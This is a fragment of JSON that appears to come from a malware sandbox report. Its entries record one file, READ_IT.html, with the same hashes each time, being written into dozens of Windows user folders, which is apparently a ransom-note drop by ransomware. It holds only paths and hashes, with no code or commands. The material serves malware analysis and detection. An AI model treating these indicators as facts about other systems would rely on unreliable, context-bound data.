"b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\webapps\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\webapps\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\indexedDB\\moz-safe-about+home\\idb\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\idb\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\bookmarkbackups\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\bookmarkbackups\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\crash reports\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_60\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\jre1.7.0_60\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\AU\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\au\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\adobe\\acrobat\\10.0\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\~nsu.tmp\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\~nsu.tmp\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\J34QD0IO\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\j34qd0io\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\793TK2YX\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\793tk2yx\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\53XUACO8\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\53xuaco8\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\4PEP48KS\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\4pep48ks\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\tr\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\tr\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\th\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\th\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sv\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sv\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sr\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sr\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sl\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sl\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\sk\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sk\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ru\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ru\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ro\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ro\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pt_PT\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_pt\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pt_BR\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pt_br\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\pl\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\pl\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\no\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\no\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\nl\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\nl\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\lv\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lv\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\lt\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\lt\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ko\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ko\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ja\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ja\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\it\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\it\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\id\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": 